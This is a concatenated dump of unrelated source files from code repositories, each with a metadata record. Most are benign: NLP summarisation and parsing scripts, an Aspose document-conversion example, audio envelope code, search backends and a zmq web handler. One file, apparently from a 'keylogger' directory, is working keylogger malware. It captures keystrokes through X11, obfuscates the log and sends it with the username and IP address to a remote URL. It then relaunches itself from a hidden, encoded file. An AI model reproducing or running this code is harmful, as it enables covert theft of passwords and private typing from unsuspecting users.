del d['k1']
d.insert((i, str(i)) for i in range(10000))
try:
print d['k4']
except KeyError:
print 'OK' | {
"repo_name": "zepheira/zenpub",
"path": "lib/persistentdict.py",
"copies": "2",
"size": "2517",
"license": "apache-2.0",
"hash": 7994470178415378000,
"line_mean": 35.4927536232,
"line_max": 110,
"alpha_frac": 0.5613825983,
"autogenerated": false,
"ratio": 3.396761133603239,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49581437319032384,
"avg_score": null,
"num_lines": null
} |
# AAR Natural Language Processing/Machine Learning Project 2015-2016
# Summarizes text using tf-idf technique
# Written by Gautam Mittal
# Mentor: Robert Cheung
# Requires Node.js and Python 2.7
from __future__ import division
import math
from textblob import TextBlob as tb
def tf(word, blob):
return blob.words.count(word) / len(blob.words)
def n_containing(word, bloblist):
return sum(1 for blob in bloblist if word in blob)
def idf(word, bloblist):
return math.log(len(bloblist) / (1 + n_containing(word, bloblist)))
def tfidf(word, blob, bloblist):
return tf(word, blob) * idf(word, bloblist)
def summarize(document1):
document1 = tb(document1)
bloblist = document1.sentences
relevance_scores = []
relevancy = {}
for i, blob in enumerate(bloblist):
# print "Top words in sentence " + str(i)
scores = {word: tfidf(word, blob, bloblist) for word in blob.words}
sorted_words = sorted(scores.items(), key=lambda x: x[1], reverse=True)
relevance = 0
sum_relevancy = 0
for word, score in sorted_words:
# print "\tWord: {}, TF-IDF: {}".format(word, score)
sum_relevancy += score
relevance = sum_relevancy/len(sorted_words)
relevance_scores.append(relevance)
relevancy[str(i)] = relevance
relevance_scores.sort(reverse=True)
final_sentences = []
num_top_results = 3
if len(bloblist) < 3:
num_top_results = 1
for s in range(0, len(relevance_scores[:num_top_results])):
for key in relevancy:
if relevancy[key] == relevance_scores[s]:
final_sentences.append(int(key))
final_sentences.sort()
final_text = ""
for x in range(0, len(final_sentences)):
if x != 0:
final_text += " " + str(document1.sentences[final_sentences[x]]).replace('\n', '')
else:
final_text = str(document1.sentences[final_sentences[x]]).replace('\n', '')
return str(final_text)
| {
"repo_name": "gmittal/aar-nlp-research-2016",
"path": "summarize.py",
"copies": "1",
"size": "2003",
"license": "mit",
"hash": -6764328423177965000,
"line_mean": 32.3833333333,
"line_max": 94,
"alpha_frac": 0.6345481777,
"autogenerated": false,
"ratio": 3.383445945945946,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4517994123645946,
"avg_score": null,
"num_lines": null
} |
# AAR Natural Language Processing/Machine Learning Project 2015-2016
# Takes plaintext as input and illustrates interpretation
# Written by Gautam Mittal
# Mentor: Robert Cheung
# Requires Node.js and Python 2.7
# $ npm install && pip install -r requirements.txt
import os, json, uuid, urllib, errno, requests
from os.path import join, dirname
from subprocess import check_output as call
from dotenv import load_dotenv
import text_parse as textEngine
import summarize as summaryEngine
from images2gif import writeGif
dl = urllib.URLopener()
from imagesoup import ImageSoup
soup = ImageSoup()
def getImageFromString(s):
images = soup.search('"'+ s +'"', n_images=1)
return images[0].URL
def generateGIF(file_names, size, uid):
for fn in file_names:
im = Image.open("./tmp_images/"+uid+"/"+fn)
im = im.resize(size, Image.ANTIALIAS)
im.save("./tmp_images/"+uid+"/"+fn, "JPEG")
images = [Image.open("./tmp_images/"+uid+"/"+fn) for fn in file_names]
writeGif("./tmp_images/"+uid+".gif", images, duration=0.5)
def make_dir(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def genTextMetrics(raw_text):
summary = summaryEngine.summarize(raw_text)
svo = textEngine.extract(summary)
final_text_data = {
"summary": summary,
"svo_data": []
}
for scene in svo:
# print scene
sent_subject = scene["raw_subject"] if len(scene["simple_subject"]) == 0 else scene["simple_subject"]
sent_object = scene["raw_object"] if len(scene["simple_object"]) == 0 else scene["simple_object"]
sent_predicate = scene["predicate"]
file_urls = {}
file_urls["subject"] = getImageFromString(sent_subject)
file_urls["verb"] = getImageFromString(sent_predicate)
if len(sent_object) != 0:
# print "OBJECT"
file_urls["object"] = getImageFromString(sent_object)
sent_data = {
"subject": {
"text": sent_subject,
"image": file_urls["subject"]
},
"verb": {
"text": sent_predicate,
"image": file_urls["verb"]
},
"object": {
"text": sent_object,
"image": file_urls["object"] if len(sent_object) != 0 else None
}
}
final_text_data["svo_data"].append(sent_data)
return final_text_data
| {
"repo_name": "gmittal/aar-nlp-research-2016",
"path": "illustrate.py",
"copies": "1",
"size": "2505",
"license": "mit",
"hash": -2195621201175721200,
"line_mean": 29.9259259259,
"line_max": 109,
"alpha_frac": 0.6031936128,
"autogenerated": false,
"ratio": 3.7276785714285716,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9815043675742762,
"avg_score": 0.0031657016971618677,
"num_lines": 81
} |
# AAR Natural Language Processing Project 2015-2016
# Takes plaintext as input and illustrates interpretation
# Written by Gautam Mittal
# Mentor: Robert Cheung
# Requires NLTK and its respective corpora
import re
import nltk
from nltk import CFG, ChartParser, RegexpParser
from nltk.corpus import stopwords, conll2000
from textblob import TextBlob as tb
from textblob import Word as word
from textblob.parsers import PatternParser
from contractions import *
train_sents = conll2000.chunked_sents('train.txt', chunk_types=['NP', 'VP', 'PP'])
test_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP', 'VP', 'PP'])
class BigramChunker(nltk.ChunkParserI):
def __init__(self, train_sents):
train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)]
for sent in train_sents]
self.tagger = nltk.BigramTagger(train_data)
def parse(self, sentence):
pos_tags = [pos for (word,pos) in sentence]
tagged_pos_tags = self.tagger.tag(pos_tags)
chunktags = [chunktag for (pos, chunktag) in tagged_pos_tags]
conlltags = [(word, pos, chunktag) for ((word,pos),chunktag)
in zip(sentence, chunktags)]
return nltk.chunk.conlltags2tree(conlltags)
bigram_chunker = BigramChunker(train_sents)
print bigram_chunker.evaluate(test_sents) # chunker accuracy
def tokenize(string):
string = str(string.replace("\n", ""))#.replace(".", ""))
words = string.split(" ")
for w in range(0, len(words)): # fix contractions
if (words[w].lower().find("'") > -1):
if (words[w] in contractions):
replace_contract = contractions[words[w]]
words.pop(w)
r = list(reversed(replace_contract.split(" ")))
for cw in range(0, len(r)):
words.insert(w, r[cw])
return words
def prepare_text(stringBlob):
# if str(stringBlob.detect_language()) != "en": # make text is in English
# print("["+stringBlob.detect_language()+"] Non-English string found. Translating...")
# stringBlob = stringBlob.translate(to="en")
stringBlob = tokenize(stringBlob)
return stringBlob
def treeToJSON(t):
json = []
for p in list(t):
if str(type(p)) != "<type 'tuple'>":
phraseJSON = {
'label': p.label(),
'text': list(p)
}
json.append(phraseJSON)
return json
def stringifyTree(t):
s = []
for x in range(0, len(t)):
s.append(t[x][0])
return " ".join(s)
def simplifyTree(t):
for x in list(t):
if x[1].find("NN") == -1:
t.remove(x)
return stringifyTree(t)
def analyze_sent_semantics(sentenceBlob):
tagged_s = tb(" ".join(prepare_text(sentenceBlob))).tags
sent_tree = bigram_chunker.parse(tagged_s)
sent_tree = treeToJSON(sent_tree) # convert to format that we can work with
# verify the verb phrases
for p in range(0, len(sent_tree)):
phrase = sent_tree[p]
if phrase["label"] == "VP":
verbCount = 0
for w in phrase["text"]:
if w[1].find("VB") > -1:
verbCount += 1
if verbCount == 0:
phrase["label"] = "PSEUDO-VP"
# print(sent_tree)
predicted_subject = []
predicted_verb = str()
predicted_actionable_noun = str()
for ph in range(0, len(sent_tree)):
p = sent_tree[ph]
if p["label"] == "NP" or (p["label"] == "PP" and (sent_tree[ph-1]["label"] == "NP" and ph-1 > -1)):
for t in p["text"]:
predicted_subject.append(t)
if p["label"] == "VP":
predicted_verb = stringifyTree(p["text"])
# iterate over everything after the predicate
for o_i in range(ph, len(sent_tree)):
o = sent_tree[o_i]
if o["label"] == "NP" or (o["label"] == "PP" and (sent_tree[o_i-1]["label"] == "NP" and o_i-1 > -1)):
predicted_actionable_noun = o["text"]
break
if o["label"] == "PP" and stringifyTree(sent_tree[o_i-1]["text"]) == predicted_verb:
predicted_verb += " " + stringifyTree(o["text"])
break
# print("Subject: " + stringifyTree(predicted_subject)) # what we think the subject might be
# print("Predicate: " + predicted_verb)
# print("Object: " + stringifyTree(predicted_actionable_noun))
semantics_analysis = {
"raw_subject": stringifyTree(predicted_subject),
"simple_subject": simplifyTree(predicted_subject),
"predicate": predicted_verb,
"raw_object": stringifyTree(predicted_actionable_noun),
"simple_object": simplifyTree(predicted_actionable_noun)
}
return semantics_analysis
def extract(storyString):
storyText = tb(storyString)
results = []
for sentence in storyText.sentences: # split text into sentences
results.append(analyze_sent_semantics(sentence))
return results
| {
"repo_name": "gmittal/aar-nlp-research-2016",
"path": "text_parse.py",
"copies": "1",
"size": "5047",
"license": "mit",
"hash": 6458818097905399000,
"line_mean": 34.5422535211,
"line_max": 117,
"alpha_frac": 0.5908460472,
"autogenerated": false,
"ratio": 3.526904262753319,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9599177645486878,
"avg_score": 0.003714532893288173,
"num_lines": 142
} |
# Aaron Reyes
# MIT license
import os
import time
import urllib
import random
import base64
import ctypes
import ctypes.util
# name of logger program on file system
LOGGER_NAME='.bash_xkey'
# remote logging URL
REMOTE_LOG_URL='<google scripts url here>?{0}'
# load library
x11 = ctypes.cdll.LoadLibrary(ctypes.util.find_library("X11"))
display = x11.XOpenDisplay(None)
keyboard = (ctypes.c_char * 32)()
key_map = {
9: ["<esc>","<esc>"],
10: ["1", "!"],
11: ["2", "@"],
12: ["3", "#"],
13: ["4", "$"],
14: ["5", "%"],
15: ["6", "^"],
16: ["7", "&"],
17: ["8", "*"],
18: ["9", "("],
19: ["0", ")"],
20: ["-", "_"],
21: ["=", "+"],
22: ["<del>", "<del>"],
23: ["<tab>", "<tab>"],
24: ["q", "Q"],
25: ["w", "W"],
26: ["e", "E"],
27: ["r", "R"],
28: ["t", "T"],
29: ["y", "Y"],
30: ["u", "U"],
31: ["i", "I"],
32: ["o", "O"],
33: ["p", "P"],
34: ["[", "{"],
35: ["]", "}"],
36: ["<ret>", "<ret>"],
37: ["<ctrl>", "<ctrl>"],
38: ["a", "A"],
39: ["s", "S"],
40: ["d", "D"],
41: ["f", "F"],
42: ["g", "G"],
43: ["h", "H"],
44: ["j", "J"],
45: ["k", "K"],
46: ["l", "L"],
47: [";", ":"],
48: ["'", '"'],
49: ["`", "~"],
51: ["\\", "|"],
52: ["z", "Z"],
53: ["x", "X"],
54: ["c", "C"],
55: ["v", "V"],
56: ["b", "B"],
57: ["n", "N"],
58: ["m", "M"],
59: [",", "<"],
60: [".", ">"],
61: ["/", "?"],
65: [" ", " "]
}
log = []
shift = False
pressed = set()
last_pressed = set()
now = time.time()
# log for 1 to 3 minutes
while time.time() < now + random.randint(60,180):
time.sleep(0.005)
x11.XQueryKeymap(display, keyboard)
# check for shift first
if ((1 << 2) & ord(keyboard[6])) or ((1 << 6) & ord(keyboard[7])):
shift = True
else:
shift = False
for i in range(len(keyboard)):
for j in range(8):
code = (i * 8) + j
if ((1 << j) & ord(keyboard[i])) and code in key_map:
pressed.add(code)
if code not in last_pressed:
if shift:
log.append(key_map[code][1])
else:
log.append(key_map[code][0])
last_pressed = set(pressed)
pressed.clear()
# basic obfuscation
log = '-'.join([str(ord(x) ^ 0x5A) for x in base64.b64encode(''.join(log))])
# send log if there is data
if log:
user = os.popen('whoami').read().strip()
ip = os.popen('hostname -I').read().strip()
params = urllib.urlencode({'api': '|'.join([log, user, ip])})
urllib.urlopen(REMOTE_LOG_URL.format(params))
# kick off the logger again
cmd = "import base64;f=open('{0}','rb');c=f.read().split('-');f.close();exec(base64.b64decode(''.join([chr(int(x)^0xA5) for x in c])))".format(LOGGER_NAME)
os.popen('echo "{0}" | python 2>/dev/null &'.format(cmd))
| {
"repo_name": "a-rey/bitflip",
"path": "keylogger/unix/logger.py",
"copies": "1",
"size": "2717",
"license": "mit",
"hash": 2334387897977272000,
"line_mean": 21.8319327731,
"line_max": 155,
"alpha_frac": 0.4729481045,
"autogenerated": false,
"ratio": 2.6225868725868726,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8521931246108152,
"avg_score": 0.014720746195744022,
"num_lines": 119
} |
aas
asa
sas
import asposewordscloud
from asposewordscloud.WordsApi import WordsApi
from asposewordscloud.models import SaveOptionsData
import asposestoragecloud
from asposestoragecloud.StorageApi import StorageApi
from asposestoragecloud.StorageApi import ResponseMessage
apiKey = "XXXXX" #sepcify App Key
appSid = "XXXXX" #sepcify App SID
apiServer = "http://api.aspose.com/v1.1"
data_folder = "../../data/"
#Instantiate Aspose Storage API SDK
storageapiClient = asposestoragecloud.ApiClient.ApiClient(apiKey, appSid, debug = True)
storageApi = StorageApi(storageapiClient)
#Instantiate Aspose Words API SDK
apiClient = asposewordscloud.ApiClient.ApiClient(apiKey, appSid, debug = True)
wordsApi = WordsApi(apiClient)
#set input file name
name = "SampleWordDocument"
filename = name + ".docx"
format = "pdf"
storage="AsposeDropboxStorage"
#upload file to 3rd Party (like dropbox cloud storage)
storageApi.PutCreate(Path = filename, file = data_folder + filename, storage=storage)
#invoke Aspose.Words Cloud SDK API to convert words document to required format
response = wordsApi.GetDocumentWithFormat(name=filename, format=format, storage=storage)
if response.Status == 'OK':
outfilename = "c:/temp/" + name + "." + format
with open(outfilename, 'wb') as f:
for chunk in response.InputStream:
f.write(chunk)
| {
"repo_name": "asposewords/Aspose_Words_Cloud",
"path": "Examples/Python/Examples/ConvertDocumentAnyFormatThirdPartyStorage.py",
"copies": "2",
"size": "1362",
"license": "mit",
"hash": 471035402669402240,
"line_mean": 32.2195121951,
"line_max": 88,
"alpha_frac": 0.7635829662,
"autogenerated": false,
"ratio": 3.396508728179551,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.014403197644652525,
"num_lines": 41
} |
aasta = int(input("Sisesta väljalaskeeaasta: "))
f = open("autod.csv", encoding="UTF-8")
# eemaldan (st. loen eest ära) päiserea
f.readline()
# korjan siia sõnastikku selle aasta mudelite arvud
mudelite_arvud = {}
for rida in f:
jupid = rida.split(";")
# tegelen ainult nende ridadega, mis käivad näidatud aasta kohta
if int(jupid[4]) == aasta:
# mudeli all mõtlen automargi ja mudeli nime kombinatsiooni
mudel = jupid[1] + " "+ jupid[2]
arv = int(jupid[8])
# kui ma seda mudelit veel pole näinud,
# siis tekitan sõnastikku tema jaoks uue kirje
if not mudel in mudelite_arvud:
mudelite_arvud[mudel] = arv
# vastasel juhul suurendan olemasoleva kirje väärtust
else:
mudelite_arvud[mudel] += arv
f.close()
# nüüd hakkan sõnastikust otsima kõige popimat mudelit
if len(mudelite_arvud) == 0:
print("Ei leidu")
else:
popim_mudel = ""
popima_mudeli_arv = 0
for mudel in mudelite_arvud:
if mudelite_arvud[mudel] > popima_mudeli_arv:
popim_mudel = mudel
popima_mudeli_arv = mudelite_arvud[mudel]
print(popim_mudel)
| {
"repo_name": "macobo/python-grader",
"path": "tasks/MTAT.03.100/2013/Midterm_1/KT2_N10_autod_solution.py",
"copies": "1",
"size": "1196",
"license": "mit",
"hash": 3819378580953038300,
"line_mean": 25.8409090909,
"line_max": 68,
"alpha_frac": 0.6316680779,
"autogenerated": false,
"ratio": 2.3667334669338675,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8343143608325931,
"avg_score": 0.031051587301587302,
"num_lines": 44
} |
__a__author__ = 'Ness'
from pylab import *
from numpy import *
''' ----Background
The envelope generators are incharge of the modulation of the sound amplitude in
4 main stages during the sound life cycle.
_____________________________________________ For a basic functional prototype, this module requires of
| Attack | 4 basic input values of time which define the duration of
|1 /\Decay | each stage PLUS the sustain level value(from 0 to 1)
|. / \ |
|. / \ |
|. / \ sustain |
|. / \_____________ |
|. / \ Realease |
|0 / \ |
|___________________________________________|
| | | | |
A D S R SustainLevel
'''
''' functions for the Iterative exponential method'''
''' Attack'''
def IterativeExp_AttackParameters(samples):
#caculate the exponential coefficient
attackCoefficient=exp((-math.log((1.0+TCO_attack)/TCO_attack))/samples)
#calculate the offset
attackOffset=(1.0+TCO_attack)*(1.0-attackCoefficient)
return (attackCoefficient, attackOffset)
def IterativeExp_CreateAttackSignal(samples,coefficient, offset):
y=zeros(samples)
y[0]=offset
for i in range(1, samples):
y[i]=offset+coefficient*y[i-1]
return y
''' Decay'''
def IterativeExp_DecayParameters(samples):
#caculate the exponential coefficient
decayCoefficient=exp((-math.log((1.0+TCO_decay)/TCO_decay))/samples)
#calculate the offset
decayOffset=(SustainLevel-TCO_decay)*(1.0-decayCoefficient)
return(decayCoefficient, decayOffset)
def IterativeExp_CreateDecaySignal(samples,coefficient, offset):
y=zeros(samples)
y[0]=1.0
for i in range(1, samples):
y[i]=offset+coefficient*y[i-1]
return y
''' Release'''
def IterativeExp_ReleaseParameters(samples):
#caculate the exponential coefficient
releaseCoefficient=exp((-math.log((1.0+TCO_release)/TCO_release))/samples)
#calculate the offset
releaseOffset= TCO_release*(1.0-releaseCoefficient)
return (releaseCoefficient,releaseOffset)
def IterativeExp_CreateReleaseSignal(samples, coefficient, offset):
y=zeros(samples)
y[0]=1.0*SustainLevel
for i in range(1, samples):
y[i]=offset+coefficient*y[i-1]
return y
''' Utility functions'''
def timeToSamples(time, sampleRate=44100):
samples=time/(1.0/sampleRate)
return int(samples)
'''Input values from User Interface'''
AttackTime=1.0 #AttackTime in seconds
DecayTime=0.20 #DecayTime in seconds
SustainTime=0.50 #SustainTime in seconds: In practice, this time is given by the duration of the user pressing the key
ReleaseTime=0.20 #ReleaseTime in seconds
SustainLevel=0.80
''' Pre-defined values'''
Fs=100 #Sample rate in Hertz
TCO_attack=exp(-1.5) #goes from %0 to %77 in 1 time constant (tau here is normalized to 1)
TCO_decay=exp(-4.95)
TCO_release=exp(-4.95) #goes down in 1 time constant
def main():
#start using the iterative exponential method
#attack curve
#get the number of samples for the attack curve
attackSamples=timeToSamples(AttackTime,Fs)
#get the coefficient and the offset for the iterative model
attackParameters=IterativeExp_AttackParameters(attackSamples)
#Perform the method
y_attack=IterativeExp_CreateAttackSignal(attackSamples,attackParameters[0],attackParameters[1])
#decay curve
decaySamples=timeToSamples(DecayTime,Fs)
decayParameters=IterativeExp_DecayParameters(decaySamples)
y_decay=IterativeExp_CreateDecaySignal(decaySamples,decayParameters[0],decayParameters[1])
#sustain curve
sustainSamples=timeToSamples(SustainTime,Fs)
y_sustain=ones(sustainSamples)*SustainLevel
#release curve
##get the number of samples for the release curve
releaseSamples=timeToSamples(ReleaseTime,Fs)
#get the coefficient and the offset for the iterative model
releaseParameters=IterativeExp_ReleaseParameters(releaseSamples)
y_release=IterativeExp_CreateReleaseSignal(releaseSamples,releaseParameters[0],releaseParameters[1])
fig=figure(1)
title('Construction of attack, decay,sustain and release phases')
graph1=fig.add_subplot(511)
axis1=arange(0,attackSamples,1)
graph1.bar(axis1,y_attack,0.1, facecolor='purple')
graph2=fig.add_subplot(512)
axis2=arange(0,decaySamples,1)
graph2.bar(axis2,y_decay,0.1, facecolor='blue')
graph3=fig.add_subplot(513)
axis3=arange(0,sustainSamples,1)
graph3.bar(axis3,y_sustain,0.1, facecolor='black')
graph4=fig.add_subplot(514)
axis4=arange(0, releaseSamples,1)
graph4.bar(axis4,y_release,0.1,facecolor='red')
graph5=fig.add_subplot(515)
y=concatenate((y_attack,y_decay,y_sustain,y_release))
axis5=arange(0,size(y),1)
graph5.bar(axis5,y,0.1,facecolor='green')
show()
if __name__=="__main__":main()
| {
"repo_name": "nessBautista/AudioLab",
"path": "prototypes/SoundSynthesis/BasicEnvelopeGenerator.py",
"copies": "1",
"size": "5110",
"license": "cc0-1.0",
"hash": -6365594492089477000,
"line_mean": 31.9677419355,
"line_max": 122,
"alpha_frac": 0.6555772994,
"autogenerated": false,
"ratio": 3.4573748308525034,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9466734245700584,
"avg_score": 0.029243576910383814,
"num_lines": 155
} |
#aAvg,aMax,aMin,aP2P,aStd,gAvg,gMax,gMin,gP2P,gStd
ed = {}
ed['aAvg'] = 1.29104272266
ed['aMax'] = 10.3381593065
ed['aMin'] = 0.0566837541211
ed['aP2P'] = 10.2814755524
ed['aStd'] = 2.0007211641
ed['gAvg'] = 200.329659457
ed['gMax'] = 443.405006738
ed['gMin'] = 3.64189053916
ed['gP2P'] = 439.763116198
ed['gStd'] = 183.597262584
if(ed['aP2P'] <= 0.941):
print("0")
else:
if(ed['aAvg'] <= 1.2813):
if(ed['gAvg'] <=95.5936):
print("1")
else:
if(ed['aAvg'] <= 1.2155):
if(ed['aStd'] <= 0.6642):
if(ed['aAvg'] <= 0.7339):
print("2")
else:
if(ed['aMin'] <= 0.1213):
print("1")
else:
print("2")
else:
if(ed['gMax'] <= 367.7342):
print("1")
else:
print("2")
else:
print("1")
else:
if(ed['aMin'] <= 0.0565):
if(ed['gAvg'] <= 257.9375):
if(ed['gMin'] <= 3.6016):
print("2")
else:
print("1")
else:
if(ed['gStd'] <= 133.4024):
print("2")
else:
print("3")
else:
if(ed['aMin'] <= 0.1215):
if(ed['gAvg'] <= 187.825):
print("2")
else:
print("3")
else:
print("3") | {
"repo_name": "cagdasyelen/fall-detection-engine",
"path": "src/DecisionTree.py",
"copies": "1",
"size": "1120",
"license": "apache-2.0",
"hash": -5140749373602360000,
"line_mean": 17.3770491803,
"line_max": 50,
"alpha_frac": 0.4982142857,
"autogenerated": false,
"ratio": 2.101313320825516,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.7857953299144309,
"avg_score": 0.048314861476241366,
"num_lines": 61
} |
"""A backend for the Elasticsearch search engine."""
from __future__ import unicode_literals
from django import forms
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext, ugettext_lazy as _
from reviewboard.search.search_backends.base import (SearchBackend,
SearchBackendForm)
class ElasticsearchConfigForm(SearchBackendForm):
"""A form for configuring the Elasticsearch search backend."""
url = forms.URLField(
label=_('Elasticsearch URL'),
help_text=_('The URL of the Elasticsearch server.'),
widget=forms.TextInput(attrs={'size': 80}))
index_name = forms.CharField(
label=_('Elasticsearch index name'),
help_text=_('The name of the Elasticsearch index.'),
widget=forms.TextInput(attrs={'size': 40}))
class ElasticsearchBackend(SearchBackend):
"""A search backend for integrating with Elasticsearch"""
search_backend_id = 'elasticsearch'
name = _('Elasticsearch')
haystack_backend_name = ('haystack.backends.elasticsearch_backend.'
'ElasticsearchSearchEngine')
default_settings = {
'URL': 'http://127.0.0.1:9200/',
'INDEX_NAME': 'reviewboard',
}
config_form_class = ElasticsearchConfigForm
form_field_map = {
'url': 'URL',
'index_name': 'INDEX_NAME',
}
def validate(self):
"""Ensure that the elasticsearch Python module is installed.
Raises:
django.core.exceptions.ValidationError:
Raised if the ``elasticsearch`` module is not installed.
"""
try:
import elasticsearch # noqa
except ImportError:
raise ValidationError(ugettext(
'The "elasticsearch" module is required to use the '
'Elasticsearch search engine.'
))
| {
"repo_name": "davidt/reviewboard",
"path": "reviewboard/search/search_backends/elasticsearch.py",
"copies": "2",
"size": "1920",
"license": "mit",
"hash": 4563333462785929700,
"line_mean": 32.6842105263,
"line_max": 72,
"alpha_frac": 0.6260416667,
"autogenerated": false,
"ratio": 4.69437652811736,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00033101621979476995,
"num_lines": 57
} |
"""A backend for the Elasticsearch search engine."""
from __future__ import unicode_literals
from importlib import import_module
from django import forms
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext, ugettext_lazy as _
from reviewboard.search.search_backends.base import (SearchBackend,
SearchBackendForm)
class ElasticsearchConfigForm(SearchBackendForm):
"""A form for configuring the Elasticsearch search backend."""
url = forms.URLField(
label=_('Elasticsearch URL'),
help_text=_('The URL of the Elasticsearch server.'),
widget=forms.TextInput(attrs={'size': 80}))
index_name = forms.CharField(
label=_('Elasticsearch index name'),
help_text=_('The name of the Elasticsearch index.'),
widget=forms.TextInput(attrs={'size': 40}))
class ElasticsearchBackend(SearchBackend):
"""A search backend for integrating with Elasticsearch"""
search_backend_id = 'elasticsearch'
name = _('Elasticsearch')
haystack_backend_name = ('haystack.backends.elasticsearch_backend.'
'ElasticsearchSearchEngine')
default_settings = {
'URL': 'http://127.0.0.1:9200/',
'INDEX_NAME': 'reviewboard',
}
config_form_class = ElasticsearchConfigForm
form_field_map = {
'url': 'URL',
'index_name': 'INDEX_NAME',
}
def validate(self):
"""Ensure that the elasticsearch Python module is installed.
Raises:
django.core.exceptions.ValidationError:
Raised if the ``elasticsearch`` module is not installed.
"""
try:
module = import_module('elasticsearch')
except ImportError:
module = None
# Check whether there's a supported version of the module available.
# Note that technically, elasticsearch 1.x is supported, but it's
# pretty old. If we're going to reference a version, we want to
# reference 2.x.
if (module is None or
not hasattr(module, 'VERSION') or
module.VERSION[0] > 2):
raise ValidationError(ugettext(
'The elasticsearch 2.x Python module (and the Elasticsearch '
'2.x service) is required. The module can be installed by '
'running: pip install "elasticsearch>=2.0,<3.0"'
))
| {
"repo_name": "reviewboard/reviewboard",
"path": "reviewboard/search/search_backends/elasticsearch.py",
"copies": "2",
"size": "2463",
"license": "mit",
"hash": 2759170254638927000,
"line_mean": 34.6956521739,
"line_max": 77,
"alpha_frac": 0.6224116931,
"autogenerated": false,
"ratio": 4.595149253731344,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6217560946831344,
"avg_score": null,
"num_lines": null
} |
"""A backend for the Whoosh search engine."""
from __future__ import unicode_literals
import os
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from reviewboard.search.search_backends.base import (SearchBackend,
SearchBackendForm)
class WhooshConfigForm(SearchBackendForm):
"""A form for configuring the Whoosh search backend."""
search_index_file = forms.CharField(
label=_("Search index directory"),
help_text=_("The directory that search index data should be stored "
"in."),
widget=forms.TextInput(attrs={'size': '80'}))
def clean_search_index_file(self):
"""Clear the search_index_file field.
This ensures the value is an absolute path and is writable.
"""
index_file = self.cleaned_data['search_index_file'].strip()
if index_file:
if not os.path.isabs(index_file):
raise ValidationError(
_("The search index path must be absolute."))
if (os.path.exists(index_file) and
not os.access(index_file, os.W_OK)):
raise ValidationError(
_('The search index path is not writable. Make sure the '
'web server has write access to it and its parent '
'directory.'))
return index_file
class WhooshBackend(SearchBackend):
"""The Whoosh search backend."""
search_backend_id = 'whoosh'
name = _('Whoosh')
haystack_backend_name = 'haystack.backends.whoosh_backend.WhooshEngine'
config_form_class = WhooshConfigForm
default_settings = {
'PATH': os.path.join(settings.SITE_DATA_DIR, 'search_index'),
}
form_field_map = {
'search_index_file': 'PATH',
}
| {
"repo_name": "davidt/reviewboard",
"path": "reviewboard/search/search_backends/whoosh.py",
"copies": "2",
"size": "1940",
"license": "mit",
"hash": -6161785956209922000,
"line_mean": 31.8813559322,
"line_max": 77,
"alpha_frac": 0.6087628866,
"autogenerated": false,
"ratio": 4.301552106430155,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 59
} |
"""A backend request handler process.
This file uses zmq.web to implement the backend logic for load balanced
Tornado request handlers.
This version uses a streaming message protocol to enable the backend to send
the HTTP body back to the frontend/browser in multiple asynchronous chunks.
To enable streaming mode, you have to use ZMQStreamingApplicationProxy in
the frontend and ZMQStreamingHTTPRequest in the backend.
To run this example:
* Start one instance of frontend_stream.py.
* Start one or more instances of backend_stream.py.
* Hit the URLs http://127.0.0.1:8888/foo and http://127.0.0.1:8888/foo/sleep?t=1.
The t parameter of this last URL can be changed to something greater than 10 to
observe the timeout behavior.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 Brian Granger, Min Ragan-Kelley
#
# Distributed under the terms of the New BSD License. The full license is in
# the file COPYING.BSD, distributed as part of this software.
#-----------------------------------------------------------------------------
import logging
logging.basicConfig(level=logging.DEBUG)
import time
from zmq.eventloop import ioloop
ioloop.install()
from tornado import web
from zmqweb import ZMQApplication, ZMQStreamingHTTPRequest
def flush_callback():
logging.info('Done flushing zmq buffers')
class FooHandler(web.RequestHandler):
@web.asynchronous
def get(self):
self.set_header('Handler', 'FooHandler')
# Each write/flush pair is send back to the frontend/browser immediately.
self.write('pow\n')
self.flush(callback=flush_callback)
self.bam_count = 10
def bam_and_finish():
if self.bam_count>0:
# Each write/flush pair is send back to the frontend/browser immediately.
self.write('bam\n')
self.flush(callback=flush_callback)
self.bam_count -= 1
else:
self.bam_pc.stop()
# Calling finish sends a final message to finish the request.
self.finish()
self.bam_pc = ioloop.PeriodicCallback(bam_and_finish, 1000, ioloop.IOLoop.instance())
self.bam_pc.start()
class SleepHandler(web.RequestHandler):
def get(self):
t = float(self.get_argument('t',1.0))
time.sleep(t)
self.finish({'status':'awake','t':t})
application = ZMQApplication(
[
# A single ZMQApplication can run multiple request handlers, but the
# frontend must use a URL regular expression that matches all of the
# patterns in the backend.
(r"/foo", FooHandler),
(r"/foo/sleep", SleepHandler)
],
# To use streaming replies, we set need to http_request_class to
# ZMQStreamingHTTPRequest. The frontend needs to use
# ZMQStreamingApplicationProxy in this case.
http_request_class=ZMQStreamingHTTPRequest
)
# Connect to the frontend on port 5555.
application.connect('tcp://127.0.0.1:5555')
ioloop.IOLoop.instance().start()
| {
"repo_name": "ellisonbg/zmqweb",
"path": "examples/backend_stream.py",
"copies": "1",
"size": "3064",
"license": "bsd-3-clause",
"hash": 7320632415571708000,
"line_mean": 34.6279069767,
"line_max": 93,
"alpha_frac": 0.6543733681,
"autogenerated": false,
"ratio": 4.074468085106383,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
